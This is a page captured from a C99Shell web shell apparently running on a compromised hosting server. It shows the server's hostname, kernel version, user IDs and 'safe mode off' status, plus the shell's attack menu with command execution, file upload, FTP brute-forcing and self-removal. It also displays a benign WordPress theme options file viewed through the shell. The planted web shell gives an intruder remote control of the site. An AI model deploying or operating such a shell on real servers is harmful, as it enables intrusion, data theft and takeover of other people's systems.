!C99Shell v.2.1 [PHP 7 Update] [1.12.2019]!

Software: Apache. PHP/5.6.40-67+ubuntu20.04.1+deb.sury.org+1 

uname -a: Linux hosting1.erectacloud.it 5.4.0-182-generic #202-Ubuntu SMP Fri Apr 26 12:29:36 UTC
2024 x86_64
 

uid=5229(web473) gid=5117(client172) groups=5117(client172),5002(sshusers) 

Safe-mode: OFF (not secure)

/var/www/clients/client172/web473/web/OLD_WP/wp-content/themes/kingsize/admin/   drwxr-xr-x
Free 180.61 GB of 490.84 GB (36.79%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     index.php (1.66 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/*
Title        : SMOF
Description    : Slightly Modified Options Framework
Version        : 1.4.0
Author        : Syamil MJ
Author URI    : http://aquagraphite.com
License        : WTFPL - http://sam.zoy.org/wtfpl/
Credits        : Thematic Options Panel - http://wptheming.com/2010/11/thematic-options-panel-v2/
               KIA Thematic Options Panel - https://github.com/helgatheviking/thematic-options-KIA
               Woo Themes - http://woothemes.com/
               Option Tree - http://wordpress.org/extend/plugins/option-tree/
*/

/**
 * Definitions
 *
 * @since 1.4.0
 */
$themedata wp_get_theme'kingsize' );
$themename str_replace' ','',strtolower($themedata['Name']) );
define'SMOF_VERSION''1.4.0' );
define'ADMIN_PATH'get_template_directory() . '/admin/' );
define'ADMIN_DIR'get_template_directory_uri() . '/admin/' );
define'LAYOUT_PATH'ADMIN_PATH '/layouts/' );
define'THEMENAME'$themedata['Name']." Settings" );
//define( 'OPTIONS', $themename.'_options' );
define'OPTIONS''wm_theme_settings' );
define'BACKUPS',$themename.'_backups' );

/**
 * Required action filters
 *
 * @uses add_action()
 *
 * @since 1.0.0
 */
if (is_admin() && isset($_GET['activated'] ) && $pagenow == "themes.php" add_action('admin_head','of_option_setup');
add_action('admin_head''optionsframework_admin_message');
add_action('admin_init','optionsframework_admin_init');
add_action('admin_menu''optionsframework_add_admin');

/**
 * Required Files
 *
 * @since 1.0.0
 */ 
require_once ( ADMIN_PATH 'functions/functions.load.php' );
require_once ( 
ADMIN_PATH 'classes/class.options_machine.php' );

/**
 * AJAX Saving Options
 *
 * @since 1.0.0
 */
add_action('wp_ajax_of_ajax_post_action''of_ajax_callback');

?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v.2.1 [PHP 7 Update] [1.12.2019] maintained by KaizenLouie and updated by cermmik | C99Shell Github (MySQL update) | Generation time: 0.0095 ]--